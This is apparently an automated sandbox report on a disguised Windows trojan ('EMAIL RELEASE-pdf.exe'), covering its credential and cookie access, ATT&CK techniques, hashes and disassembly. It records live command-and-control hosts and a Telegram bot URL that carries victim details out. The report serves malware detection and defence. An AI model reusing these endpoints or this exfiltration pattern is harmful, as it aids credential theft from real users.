                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: PK241200518-EMAIL RELEASE-pdf.exe Binary or memory string: WIN_81
                Source: PK241200518-EMAIL RELEASE-pdf.exe Binary or memory string: WIN_XP
                Source: PK241200518-EMAIL RELEASE-pdf.exe Binary or memory string: WIN_XPe
                Source: PK241200518-EMAIL RELEASE-pdf.exe Binary or memory string: WIN_VISTA
                Source: PK241200518-EMAIL RELEASE-pdf.exe Binary or memory string: WIN_7
                Source: PK241200518-EMAIL RELEASE-pdf.exe Binary or memory string: WIN_8
                Source: PK241200518-EMAIL RELEASE-pdf.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                Source: Yara match, File source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.4548549275.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: PK241200518-EMAIL RELEASE-pdf.exe PID: 1264, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 5908, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match, File source: 00000002.00000002.4548549275.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: PK241200518-EMAIL RELEASE-pdf.exe PID: 1264, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 5908, type: MEMORYSTR
                Source: Yara match, File source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: PK241200518-EMAIL RELEASE-pdf.exe PID: 1264, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 5908, type: MEMORYSTR
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe Code function: 0_2_007C6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_007C6283
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe Code function: 0_2_007C6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_007C6747
                Tactics and techniques (the report's matrix, which extraction flattened, listed here by tactic column; a number in front of a technique is reproduced exactly as it appears in the report)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
                Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                Execution: 12 Native API; 2 Command and Scripting Interpreter; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 212 Process Injection; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                Defense Evasion: 11 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 11 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 212 Process Injection; HTML Smuggling; Dynamic API Resolution
                Credential Access: 1 OS Credential Dumping; 121 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                Discovery: 2 System Time Discovery; 1 Account Discovery; 1 File and Directory Discovery; 127 System Information Discovery; 131 Security Software Discovery; 11 Virtualization/Sandbox Evasion; 2 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery; 1 System Network Configuration Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
                Collection: 11 Archive Collected Data; 1 Data from Local System; 1 Screen Capture; 1 Email Collection; 121 Input Capture; 3 Clipboard Data; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                Command and Control: 1 Web Service; 4 Ingress Tool Transfer; 11 Encrypted Channel; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
                Source | Detection | Scanner | Label | Link
                PK241200518-EMAIL RELEASE-pdf.exe | 63% | ReversingLabs | Win32.Trojan.AutoitInject |
                PK241200518-EMAIL RELEASE-pdf.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                reallyfreegeoip.org | 172.67.177.134 | true | false | | high
                api.telegram.org | 149.154.167.220 | true | false | | high
                checkip.dyndns.com | 132.226.8.169 | true | false | | high
                checkip.dyndns.org | unknown | unknown | false | | high

                Name | Malicious | Antivirus Detection | Reputation
                https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:887849%0D%0ADate%20and%20Time:%2018/12/2024%20/%2023:50:08%0D%0ACountry%20Name:%20%0D%0A%5B%20887849%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
                http://checkip.dyndns.org/ | false | | high

                Name | Source | Malicious | Antivirus Detection | Reputation
                https://www.office.com/ | RegSvcs.exe, 00000002.00000002.4548549275.0000000002F08000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://duckduckgo.com/chrome_newtab | RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://chrome.google.com/webstore?hl=enlBeq | RegSvcs.exe, 00000002.00000002.4548549275.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://duckduckgo.com/ac/?q= | RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://api.telegram.org | RegSvcs.exe, 00000002.00000002.4548549275.0000000002E03000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://www.google.com/images/branding/product/ico/googleg_lodp.ico | RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://api.telegram.org/bot | PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | | high
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://checkip.dyndns.org | RegSvcs.exe, 00000002.00000002.4548549275.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002E03000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://api.telegram.org/bot/sendMessage?chat_id=&text= | RegSvcs.exe, 00000002.00000002.4548549275.0000000002E03000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://chrome.google.com/webstore?hl=en | RegSvcs.exe, 00000002.00000002.4548549275.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://www.ecosia.org/newtab/ | RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://varders.kozow.com:8081 | PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | | high
                http://aborters.duckdns.org:8081 | PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | | high
                https://ac.ecosia.org/autocomplete?q= | RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:887849%0D%0ADate%20a | RegSvcs.exe, 00000002.00000002.4548549275.0000000002E03000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://anotherarmy.dns.army:8081 | PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | | high
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://checkip.dyndns.org/q | PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | | high
                https://reallyfreegeoip.org/xml/8.46.123.189$ | RegSvcs.exe, 00000002.00000002.4548549275.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://reallyfreegeoip.org | RegSvcs.exe, 00000002.00000002.4548549275.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002D91000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 00000002.00000002.4548549275.0000000002D41000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmp | false
                                                                              high
                                                                              http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedPK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                high
                                                                                https://reallyfreegeoip.org/xml/PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002D91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.office.com/lBeqRegSvcs.exe, 00000002.00000002.4548549275.0000000002F03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
IP               Domain               Country         ASN    ASN Name         Malicious
132.226.8.169    checkip.dyndns.com   United States   16989  UTMEMUS          false
149.154.167.220  api.telegram.org     United Kingdom  62041  TELEGRAMRU       false
172.67.177.134   reallyfreegeoip.org  United States   13335  CLOUDFLARENETUS  false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1577088
Start date and time: 2024-12-18 00:29:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 3s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PK241200518-EMAIL RELEASE-pdf.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/2@3/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 54
• Number of non-executed functions: 269
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: PK241200518-EMAIL RELEASE-pdf.exe
Time      Type             Description
18:30:26  API Interceptor  9875255x Sleep call for process: RegSvcs.exe modified
                                                                                                        87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • 172.67.177.134
                                                                                                        Ls4O6Pmixd.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                        • 172.67.177.134
                                                                                                        TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 172.67.177.134
                                                                                                        MV GOLDEN SCHULTE DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 172.67.177.134
                                                                                                        PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        • 172.67.177.134
                                                                                                        pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 172.67.177.134
                                                                                                        HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 172.67.177.134
                                                                                                        hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 172.67.177.134
                                                                                                        PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        • 172.67.177.134
                                                                                                        3b5074b1b5d032e5620f69f9f700ff0esupport.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                        • 149.154.167.220
                                                                                                        https://ce4.ajax.a8b.co/get?redir=1&id=d4vCW7zizPl1mo0GYx0ELgo+CCIybH9/c4qC7CeWEuI=&uri=//the-western-fire-chiefs-association.jimdosite.comGet hashmaliciousUnknownBrowse
                                                                                                        • 149.154.167.220
                                                                                                        zyEDYRU0jw.exeGet hashmaliciousArcaneBrowse
                                                                                                        • 149.154.167.220
                                                                                                        zyEDYRU0jw.exeGet hashmaliciousArcaneBrowse
                                                                                                        • 149.154.167.220
                                                                                                        hngarm13de02.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                        • 149.154.167.220
                                                                                                        http://escrowmedifllc.hostconstructionapp.comGet hashmaliciousUnknownBrowse
                                                                                                        • 149.154.167.220
                                                                                                        BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                                                                        • 149.154.167.220
                                                                                                        ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        174 Power Global_Enrollment_.docx.docGet hashmaliciousUnknownBrowse
                                                                                                        • 149.154.167.220
                                                                                                        No context
Process: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe
File Type: data
Category: dropped
Size (bytes): 110788
Entropy (8bit): 7.786105521081938
Encrypted: false
SSDEEP: 1536:QEQzyChJZfs3KyNx7qAkhKt67Z3P2pCBlT8JnvAgXdviRjqWHHuyLvDIW5XsLcnT:QEKhsNkM67Z/X/GvTXdvnGHnPFp++Jx
MD5: 5D7FC14E8538B4C0D0CD5E8F4D1F1BAC
SHA1: FD1CEA2751E2D50BC839CCDA7BC284F664A61D75
SHA-256: 2BAAF0AE986B07216B708C81179AE98B47DB4A3DE459F2E5D178E370B44393EA
SHA-512: 849FBE71480D68B8E65B3C3A436C5F9274F595A1CAF370EFAC5CCAA6C1AF985472E9B2999FF227EFD63B50B9EAAF3D3CCAE632EF4985AFA7833F4ACB26B2759C
Malicious: false
Reputation: low
                                                                                                        Preview:EA06..0...;.Y.FcT.M.4.o&.H.P..Y...p..*Sj."d.!........'...s.fb8..?..H+s.l.>.I.5...gX.I..)|.3#.N.....-y..+..L./\.W.....A.[.BeT...2...vj3:..oa.T...D....:kL.E....$.@..&.`..iX.M.$34........Pb.6.sfT*..sA..d4..........-..A.Mi.Y0..."..f. .P....@V..;8..#@...P..I0..f..X....Y5...=r.V%...oZ..$.`.... T...l.....f1H... ..k.....1. &...b....D..P.......3......5].}...U&`...mX.t...........4....=..y..........A.`....`..@....@...A...f.. P......u..*...x..2....9....i...s.V(S+F.m...k....V....*G6.9..d.....5. &6.,..L&.Y.....Q.Y...T..$....'.....K.A.M.5{.B.J.^).Y.F7r.My....S.X).}.`...Y.....5.. $....cF.M.. .... ...eJes.F,.:H....G"s*..L.....FyT.L.v.d..@..m.|..@.S/..."{B..bw:}..........@.Tcwjt..@..,Q..z.9.....>...X.V.|.YQ..#s`..@...0..".j..I.Nor...\..G+.*....Th5z..cL.G..$..Y9...d.eN..&.......g...X..6..@.{@..D..Tk..eB......1..+.."eD.........T.........i.......V.v...#..&.....7..jtx..cT.G#.........6...$.T..T..<..&u.m....R&...BsQ..t....Z.q@h.'T.@.I.=p..1d...R....j..t@(..b.`h....
Process: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe
File Type: data
Category: dropped
Size (bytes): 274432
Entropy (8bit): 6.814857726622359
Encrypted: false
SSDEEP: 6144:DDjeYIPoFRNFLz4MAOoeSWBTUDYuN/LVO:qPoFRNFLz4MAOoeSWBTUUuNzVO
MD5: 08328193BB484CEAA531D822B0075455
SHA1: C8E91AA085D3CF1613D32DF6B6CB8044142EED69
SHA-256: A4465FDE2784CB11F3B55E2E9B2086A9E493DA509E88FB568D8F94825D0278E9
SHA-512: 479D3A4E5D17053D21CD201F9E815184EF792B327455C40AC9ADD82553ABE0F5A968DCC82050B735C90BD33CD670FB518479FF5754C1733EFC871A7B58A790DA
Malicious: false
Reputation: low
                                                                                                        Preview:...E:Q1T461L..XH.BME9Q1Tp61LR6XH2BME9Q1T061LR6XH2BME9Q1T061L.6XH<].K9.8...0.... [1m5K>V&Q[./3X6'Fb/ .#D:.__l.y.h_-) .\<^.61LR6XHb.MEuP2T.*R6XH2BME.Q3U;7aLR,\H2VME9Q1T~.5LR.XH2.IE9QqT0.1LR4XH6BME9Q1T461LR6XH2.IE9S1T061LP6..2B]E9A1T06!LR&XH2BME)Q1T061LR6XH.uIEjQ1T0v5LE&XH2BME9Q1T061LR6XH2"IE5Q1T061LR6XH2BME9Q1T061LR6XH2BME9Q1T061LR6XH2BME9Q1T0.1LZ6XH2BME9Q1T8.1L.6XH2BME9Q1T.BT4&6XHfZIE9q1T0,5LR4XH2BME9Q1T061Lr6X(.0>7ZQ1T'&1LRv\H2PME9M5T061LR6XH2BMEyQ1..DT =UXH>BME915T041LR.\H2BME9Q1T061L.6X.2BME9Q1T061LR6XH.zIE9Q1Tx61LP6]H..OEY.0T361L.6XN..OE.Q1T061LR6XH2BME9Q1T061LR6XH2BME9Q1T061LR6XH.?.J...=C..LR6XH2COF=W9\061LR6XHLBME.Q1Tp61Le6XH.BMETQ1T.61L,6XHLBME]Q1TB61L36XHuBMEVQ1T^61L,6XH,@ee9Q;~.63ds6XB2h.6.Q1^.71LVE{H2H.G9Q5'.61F.5XH61hE9[.P065?t6XB.GME={kT3.'JR6C'.BMO9R.A661Wx.XJ.xME3Q.r05.YT6XS.`MG.X1T4.g?O6XN..ME3%8T04.FR6\b,@e.9Q;~.H:LR2sH.`3I9Q5.0..2_6XL.Bg[;.<T02.n,8XH6iMo./>T02.Lx(Z.=BMA.sOD065gR.z6#BMA.Q.vN$1LV.Xb.<^E9U.T..OXR6\c2ho;,Q1P.6.n, XH6iMo./&T02.Lx.&P2BIn9{/V..1LV.^bPB?.,QAW
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.981917613125755
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: PK241200518-EMAIL RELEASE-pdf.exe
File size: 1'006'592 bytes
MD5: 6897b3d43af4aca3376a79d7169746db
SHA1: fec918d4e90a3697a78931ac4dab8dc6da637afb
SHA256: 23659bb599448db31b14bf56938cae2970929167fa41ad9d7e35cae65c1b4a64
SHA512: 5a7dda8f4340a7b56400da996ed24862bdada176ce228b20f9807babfc870a5b00e4be4521ace0e3032b32c715bba543aef35db92c599879b81c0b9d38dbc582
SSDEEP: 24576:Zu6J33O0c+JY5UZ+XC0kGso6Fa71mhxHTCWY:bu0c++OCvkGs9Fa71m3H1Y
TLSH: E225AD22B3DDC360CB669173BF69B7016EBF78610630B95B2F980D7DA950171262C7A3
                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
Icon Hash: 3570b480858580c5
Entrypoint: 0x427dcd
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x67606C38 [Mon Dec 16 18:06:48 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: afcdf79be1557326c854b6e20cb900a7
                                                                                                        Instruction
                                                                                                        call 00007F265866118Ah
                                                                                                        jmp 00007F2658653F54h
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        push edi
                                                                                                        push esi
                                                                                                        mov esi, dword ptr [esp+10h]
                                                                                                        mov ecx, dword ptr [esp+14h]
                                                                                                        mov edi, dword ptr [esp+0Ch]
                                                                                                        mov eax, ecx
                                                                                                        mov edx, ecx
                                                                                                        add eax, esi
                                                                                                        cmp edi, esi
                                                                                                        jbe 00007F26586540DAh
                                                                                                        cmp edi, eax
                                                                                                        jc 00007F265865443Eh
                                                                                                        bt dword ptr [004C31FCh], 01h
                                                                                                        jnc 00007F26586540D9h
                                                                                                        rep movsb
                                                                                                        jmp 00007F26586543ECh
                                                                                                        cmp ecx, 00000080h
                                                                                                        jc 00007F26586542A4h
                                                                                                        mov eax, edi
                                                                                                        xor eax, esi
                                                                                                        test eax, 0000000Fh
                                                                                                        jne 00007F26586540E0h
                                                                                                        bt dword ptr [004BE324h], 01h
                                                                                                        jc 00007F26586545B0h
                                                                                                        bt dword ptr [004C31FCh], 00000000h
                                                                                                        jnc 00007F265865427Dh
                                                                                                        test edi, 00000003h
                                                                                                        jne 00007F265865428Eh
                                                                                                        test esi, 00000003h
                                                                                                        jne 00007F265865426Dh
                                                                                                        bt edi, 02h
                                                                                                        jnc 00007F26586540DFh
                                                                                                        mov eax, dword ptr [esi]
                                                                                                        sub ecx, 04h
                                                                                                        lea esi, dword ptr [esi+04h]
                                                                                                        mov dword ptr [edi], eax
                                                                                                        lea edi, dword ptr [edi+04h]
                                                                                                        bt edi, 03h
                                                                                                        jnc 00007F26586540E3h
                                                                                                        movq xmm1, qword ptr [esi]
                                                                                                        sub ecx, 08h
                                                                                                        lea esi, dword ptr [esi+08h]
                                                                                                        movq qword ptr [edi], xmm1
                                                                                                        lea edi, dword ptr [edi+08h]
                                                                                                        test esi, 00000007h
                                                                                                        je 00007F2658654135h
                                                                                                        bt esi, 03h
                                                                                                        jnc 00007F2658654188h
Programming Language:
• [ASM] VS2013 build 21005
• [ C ] VS2013 build 21005
• [C++] VS2013 build 21005
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2013 UPD4 build 31101
• [RES] VS2013 build 21005
• [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x2d3a8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf5000 | 0x711c | .reloc
